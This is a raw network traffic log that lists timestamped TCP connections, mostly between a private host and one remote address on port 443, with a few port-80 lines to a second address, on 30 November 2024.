Nov 30, 2024 12:48:02.406466961 CET	443	49760	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.406543016 CET	49760	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.406655073 CET	49760	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.406665087 CET	443	49760	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.439209938 CET	443	49756	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.439260960 CET	443	49756	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.439331055 CET	49756	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.439502954 CET	49756	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.439518929 CET	443	49756	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.439527988 CET	49756	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.439537048 CET	443	49756	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.442015886 CET	49761	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.442043066 CET	443	49761	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.442122936 CET	49761	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.442243099 CET	49761	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.442256927 CET	443	49761	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.480066061 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.480087996 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.480165005 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.480205059 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.480269909 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.480304956 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.480304956 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.480321884 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.480485916 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.480513096 CET	443	49757	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.480556011 CET	49757	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.481966019 CET	49762	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.481987000 CET	443	49762	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.482048988 CET	49762	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.482146025 CET	49762	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.482156992 CET	443	49762	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.482428074 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.482450008 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.482491970 CET	49759	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.482508898 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.482609034 CET	49759	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.482609987 CET	49759	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.482637882 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.482765913 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.482794046 CET	443	49759	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.482837915 CET	49759	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.484272003 CET	49763	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.484282017 CET	443	49763	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.484334946 CET	49763	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.484438896 CET	49763	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.484450102 CET	443	49763	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.550180912 CET	443	49758	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.550224066 CET	443	49758	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.550266981 CET	49758	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.550390959 CET	49758	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.550398111 CET	443	49758	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.550407887 CET	49758	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.550411940 CET	443	49758	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.552212000 CET	49764	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.552237034 CET	443	49764	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:02.552299023 CET	49764	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.552422047 CET	49764	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:02.552434921 CET	443	49764	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.187056065 CET	443	49760	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.187948942 CET	49760	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.187980890 CET	443	49760	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.188448906 CET	49760	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.188453913 CET	443	49760	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.285376072 CET	443	49761	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.285784006 CET	49761	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.285803080 CET	443	49761	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.286166906 CET	49761	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.286170959 CET	443	49761	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.297941923 CET	443	49763	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.298214912 CET	443	49762	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.298532963 CET	49763	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.298547029 CET	443	49763	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.298923969 CET	49763	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.298927069 CET	443	49763	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.298962116 CET	49762	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.298985958 CET	443	49762	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.299338102 CET	49762	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.299343109 CET	443	49762	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.396836042 CET	443	49764	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.397279978 CET	49764	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.397293091 CET	443	49764	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.397659063 CET	49764	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.397665024 CET	443	49764	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.631192923 CET	443	49760	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.631263018 CET	443	49760	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.631442070 CET	49760	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.631867886 CET	49760	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.631882906 CET	443	49760	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.631897926 CET	49760	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.631902933 CET	443	49760	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.634814978 CET	49765	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.634845972 CET	443	49765	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.634936094 CET	49765	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.635087013 CET	49765	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.635102034 CET	443	49765	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.739070892 CET	443	49761	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.739119053 CET	443	49761	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.739171982 CET	49761	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.739298105 CET	49761	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.739310980 CET	443	49761	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.739325047 CET	49761	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.739329100 CET	443	49761	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.741324902 CET	49766	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.741353035 CET	443	49766	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.741427898 CET	49766	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.741549015 CET	49766	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.741563082 CET	443	49766	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.742304087 CET	443	49763	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.742350101 CET	443	49763	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.742388964 CET	49763	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.742481947 CET	49763	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.742481947 CET	49763	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.742489100 CET	443	49763	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.742496014 CET	443	49763	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.742710114 CET	443	49762	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.742763042 CET	443	49762	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.742810011 CET	49762	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.742867947 CET	49762	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.742872953 CET	443	49762	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.742882013 CET	49762	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.742886066 CET	443	49762	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.744609118 CET	49767	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.744620085 CET	443	49767	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.744682074 CET	49767	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.744776011 CET	49767	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.744787931 CET	443	49767	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.744854927 CET	49768	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.744888067 CET	443	49768	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.744951010 CET	49768	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.745058060 CET	49768	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.745070934 CET	443	49768	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.850620985 CET	443	49764	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.850667000 CET	443	49764	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.850744009 CET	49764	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.850866079 CET	49764	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.850876093 CET	443	49764	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.850886106 CET	49764	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.850892067 CET	443	49764	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.852765083 CET	49769	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.852794886 CET	443	49769	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:04.852854013 CET	49769	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.852967024 CET	49769	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:04.852979898 CET	443	49769	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.447707891 CET	443	49767	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.448302984 CET	49767	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.448332071 CET	443	49767	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.448683023 CET	49767	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.448688030 CET	443	49767	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.449479103 CET	443	49765	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.449744940 CET	49765	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.449758053 CET	443	49765	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.450090885 CET	49765	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.450094938 CET	443	49765	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.526839018 CET	443	49768	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.527287960 CET	49768	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.527308941 CET	443	49768	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.527575970 CET	49768	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.527580023 CET	443	49768	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.653235912 CET	443	49769	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.653772116 CET	49769	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.653789997 CET	443	49769	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.654124022 CET	49769	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.654129028 CET	443	49769	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.658437014 CET	443	49766	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.658731937 CET	49766	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.658756018 CET	443	49766	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.659085989 CET	49766	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.659091949 CET	443	49766	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.893423080 CET	443	49765	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.893501997 CET	443	49765	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.893567085 CET	49765	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.893789053 CET	49765	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.893804073 CET	443	49765	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.893815994 CET	49765	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.893821001 CET	443	49765	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.901279926 CET	443	49767	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.901352882 CET	443	49767	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.901417017 CET	49767	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.902046919 CET	49767	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.902050972 CET	443	49767	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.902069092 CET	49767	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.902080059 CET	443	49767	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.903475046 CET	49771	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.903491974 CET	443	49771	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.903569937 CET	49771	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.903704882 CET	49771	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.903717995 CET	443	49771	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.904267073 CET	49772	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.904311895 CET	443	49772	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.904383898 CET	49772	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.904453993 CET	49772	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.904468060 CET	443	49772	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.971532106 CET	443	49768	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.971577883 CET	443	49768	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.971621037 CET	49768	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.971741915 CET	49768	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.971755028 CET	443	49768	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.971765041 CET	49768	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.971770048 CET	443	49768	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.973799944 CET	49773	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.973872900 CET	443	49773	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:06.973956108 CET	49773	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.974071026 CET	49773	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:06.974103928 CET	443	49773	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.096997976 CET	443	49769	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.097042084 CET	443	49769	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.097095966 CET	49769	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.097217083 CET	49769	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.097223997 CET	443	49769	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.097237110 CET	49769	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.097242117 CET	443	49769	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.099087000 CET	49774	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.099103928 CET	443	49774	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.099174976 CET	49774	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.099297047 CET	49774	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.099306107 CET	443	49774	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.113923073 CET	443	49766	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.113965988 CET	443	49766	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.114018917 CET	49766	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.114124060 CET	49766	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.114139080 CET	443	49766	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.114149094 CET	49766	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.114154100 CET	443	49766	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.115964890 CET	49775	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.116003990 CET	443	49775	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:07.116101027 CET	49775	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.116334915 CET	49775	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:07.116362095 CET	443	49775	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.620109081 CET	443	49772	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.620637894 CET	49772	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.620661020 CET	443	49772	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.621118069 CET	49772	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.621124029 CET	443	49772	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.684124947 CET	443	49771	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.684613943 CET	49771	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.684633017 CET	443	49771	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.685161114 CET	49771	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.685165882 CET	443	49771	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.753314018 CET	443	49773	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.753699064 CET	49773	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.753746033 CET	443	49773	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.754117012 CET	49773	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.754132032 CET	443	49773	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.814888000 CET	443	49774	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.815227985 CET	49774	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.815244913 CET	443	49774	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.815633059 CET	49774	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.815637112 CET	443	49774	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.962703943 CET	443	49775	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.963172913 CET	49775	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.963197947 CET	443	49775	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:08.963651896 CET	49775	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:08.963664055 CET	443	49775	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.055224895 CET	443	49772	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.055288076 CET	443	49772	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.055370092 CET	49772	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.055620909 CET	49772	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.055646896 CET	443	49772	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.055660963 CET	49772	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.055668116 CET	443	49772	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.058929920 CET	49776	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.058958054 CET	443	49776	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.059061050 CET	49776	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.059230089 CET	49776	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.059242964 CET	443	49776	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.128494978 CET	443	49771	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.128571033 CET	443	49771	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.128626108 CET	49771	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.128823996 CET	49771	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.128834963 CET	443	49771	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.128844023 CET	49771	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.128848076 CET	443	49771	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.131593943 CET	49777	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.131628990 CET	443	49777	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.131715059 CET	49777	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.131858110 CET	49777	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.131872892 CET	443	49777	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.198299885 CET	443	49773	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.198357105 CET	443	49773	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.198487043 CET	49773	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.198648930 CET	49773	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.198698997 CET	443	49773	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.198731899 CET	49773	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.198749065 CET	443	49773	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.201185942 CET	49778	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.201195955 CET	443	49778	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.201272011 CET	49778	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.201406956 CET	49778	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.201417923 CET	443	49778	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.250498056 CET	443	49774	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.250546932 CET	443	49774	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.250592947 CET	49774	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.250705004 CET	49774	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.250721931 CET	443	49774	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.250740051 CET	49774	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.250745058 CET	443	49774	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.252808094 CET	49779	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.252818108 CET	443	49779	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.252877951 CET	49779	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.253051043 CET	49779	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.253062010 CET	443	49779	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.374892950 CET	49724	80	192.168.2.4	199.232.214.172
Nov 30, 2024 12:48:09.416162014 CET	443	49775	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.416209936 CET	443	49775	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.416263103 CET	49775	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.416490078 CET	49775	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.416490078 CET	49775	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.416512966 CET	443	49775	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.416533947 CET	443	49775	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.419550896 CET	49780	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.419585943 CET	443	49780	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.419672012 CET	49780	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.419830084 CET	49780	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:09.419871092 CET	443	49780	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:09.495379925 CET	80	49724	199.232.214.172	192.168.2.4
Nov 30, 2024 12:48:09.495445013 CET	49724	80	192.168.2.4	199.232.214.172
Nov 30, 2024 12:48:10.907038927 CET	443	49776	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:10.910496950 CET	49776	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:10.910518885 CET	443	49776	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:10.910993099 CET	49776	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:10.910999060 CET	443	49776	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:10.978374958 CET	443	49777	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:10.982315063 CET	49777	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:10.982346058 CET	443	49777	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:10.982692957 CET	49777	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:10.982697010 CET	443	49777	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.032212019 CET	443	49779	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.034485102 CET	49779	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.034492970 CET	443	49779	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.034919977 CET	49779	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.034924030 CET	443	49779	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.047352076 CET	443	49778	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.047684908 CET	49778	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.047700882 CET	443	49778	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.048136950 CET	49778	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.048141003 CET	443	49778	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.265026093 CET	443	49780	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.265435934 CET	49780	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.265490055 CET	443	49780	13.107.246.63	192.168.2.4
